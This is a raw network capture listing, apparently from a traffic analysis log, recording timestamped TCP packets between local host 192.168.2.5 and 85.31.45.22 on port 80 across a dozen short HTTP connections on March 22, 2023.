Mar 22, 2023 11:21:19.055083990 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055092096 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055095911 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055118084 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055141926 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055145025 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055160046 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055165052 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055190086 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055195093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055214882 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.055222988 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055272102 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.055272102 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.056960106 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.056984901 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057004929 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057025909 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057045937 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057061911 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.057066917 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057086945 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057106972 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057117939 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.057126999 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057141066 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.057176113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.057406902 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057434082 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.057475090 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.057516098 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.067929029 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.067961931 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.067980051 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068020105 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068042040 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068048954 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068048954 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068062067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068085909 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068103075 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068109035 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068126917 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068130970 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068151951 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068172932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068171978 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068186998 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068192959 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068213940 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068233967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068253994 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068254948 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068254948 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068254948 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068273067 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068274975 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068284988 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068295956 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068306923 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068315983 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068326950 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068336964 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068348885 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068358898 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068375111 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068378925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068401098 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068412066 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068432093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068454027 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068473101 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068492889 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068514109 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068535089 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068553925 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068556070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068556070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068556070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068556070 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068576097 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068578005 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068595886 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068607092 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068618059 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068630934 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068639040 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068659067 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068664074 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068681002 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068681002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068695068 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068716049 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068732023 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068736076 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068757057 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068769932 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068777084 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068797112 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068816900 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068825006 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068825006 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068839073 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068856001 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068860054 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068880081 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068887949 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068901062 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068919897 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068922997 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.068941116 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068960905 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068980932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.068999052 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069020033 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069029093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069029093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069029093 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069041014 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069046974 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069067001 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069080114 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069091082 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069116116 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069128036 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069144011 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069154978 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069154978 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069173098 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069196939 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069205999 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069216967 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069222927 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069240093 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069257975 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069267988 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069292068 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069292068 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069315910 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069325924 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069339991 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069358110 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069366932 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069391966 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069395065 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069395065 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069412947 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069427967 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069433928 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069453955 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069474936 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069494963 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069514036 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069535017 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069546938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069546938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069546938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069546938 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069555044 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069571972 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069576025 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069597960 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069610119 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069617033 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069637060 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069652081 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069658041 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069665909 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069679022 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069698095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069709063 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069719076 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069732904 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069740057 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069761038 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069765091 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069781065 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069793940 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069801092 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069820881 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069828033 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069840908 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069859982 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069861889 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069875956 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069881916 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069901943 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069914103 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069922924 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069928885 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069943905 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069952965 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069967031 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069976091 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.069987059 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.069997072 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070007086 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070015907 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070029020 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070036888 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070049047 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070058107 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070070982 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070086002 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070092916 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070116997 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070135117 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070153952 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070173979 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070197105 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070198059 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070197105 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070197105 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070216894 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070225954 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070238113 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070251942 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:19.070265055 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070282936 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.070303917 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.077917099 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:19.104594946 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.450634003 CET	49695	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.479768991 CET	80	49695	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.479861021 CET	49695	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.480331898 CET	49695	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.556329966 CET	80	49695	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.625881910 CET	80	49695	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.625958920 CET	49695	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.626068115 CET	49695	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.627877951 CET	49696	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.655504942 CET	80	49695	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.655565977 CET	80	49696	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.655751944 CET	49696	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.656224966 CET	49696	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.724406958 CET	80	49696	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.779136896 CET	80	49696	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.779212952 CET	80	49696	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.779278994 CET	80	49696	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.779329062 CET	49696	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.779380083 CET	49696	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.782167912 CET	49696	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.788527966 CET	49697	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.809197903 CET	80	49696	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.815187931 CET	80	49697	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.815390110 CET	49697	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.825402975 CET	49697	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.900424957 CET	80	49697	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.958632946 CET	80	49697	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:21.958797932 CET	49697	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.958905935 CET	49697	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:21.985676050 CET	80	49697	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.545020103 CET	49698	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.571966887 CET	80	49698	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.572185040 CET	49698	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.588946104 CET	49698	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.588999987 CET	49698	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.615917921 CET	80	49698	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.615952969 CET	80	49698	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.750438929 CET	80	49698	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.750533104 CET	49698	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.750758886 CET	49698	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.754112959 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.777198076 CET	80	49698	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.780894995 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.781069040 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.781447887 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.781528950 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.807971001 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.807996035 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.808015108 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.965188026 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.965245962 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:22.965374947 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.965461969 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.970026970 CET	49699	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.980134964 CET	49700	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:22.996737003 CET	80	49699	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.007021904 CET	80	49700	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.007251024 CET	49700	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.007649899 CET	49700	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.007649899 CET	49700	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.034493923 CET	80	49700	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.195620060 CET	80	49700	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.195678949 CET	80	49700	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.195887089 CET	49700	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.196075916 CET	49700	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.210589886 CET	49701	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.222558975 CET	80	49700	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.237807989 CET	80	49701	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.238034010 CET	49701	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.238451004 CET	49701	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.238593102 CET	49701	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.264985085 CET	80	49701	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.265098095 CET	80	49701	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.390814066 CET	80	49701	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.390873909 CET	80	49701	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.391042948 CET	49701	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.391232014 CET	49701	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.395849943 CET	49702	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.417627096 CET	80	49701	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.422435999 CET	80	49702	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.422621965 CET	49702	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.426356077 CET	49702	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.426419020 CET	49702	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.452996016 CET	80	49702	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.453030109 CET	80	49702	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.580054998 CET	80	49702	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.580235004 CET	49702	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.586529016 CET	49702	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.596693993 CET	49703	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.613178015 CET	80	49702	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.623390913 CET	80	49703	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.623579025 CET	49703	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.624208927 CET	49703	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.624311924 CET	49703	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.650808096 CET	80	49703	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.771796942 CET	80	49703	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.771980047 CET	49703	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.772119045 CET	49703	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.783983946 CET	49704	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.798789978 CET	80	49703	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.810761929 CET	80	49704	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.810931921 CET	49704	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.811414957 CET	49704	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.811491966 CET	49704	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.838007927 CET	80	49704	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.959517956 CET	80	49704	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.959579945 CET	80	49704	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.959747076 CET	49704	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.959937096 CET	49704	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.969260931 CET	49705	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.986572981 CET	80	49704	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.995961905 CET	80	49705	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:23.996355057 CET	49705	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.997498989 CET	49705	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:23.997612953 CET	49705	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:24.024035931 CET	80	49705	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.024065971 CET	80	49705	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:24.179054976 CET	80	49705	85.31.45.22	192.168.2.5
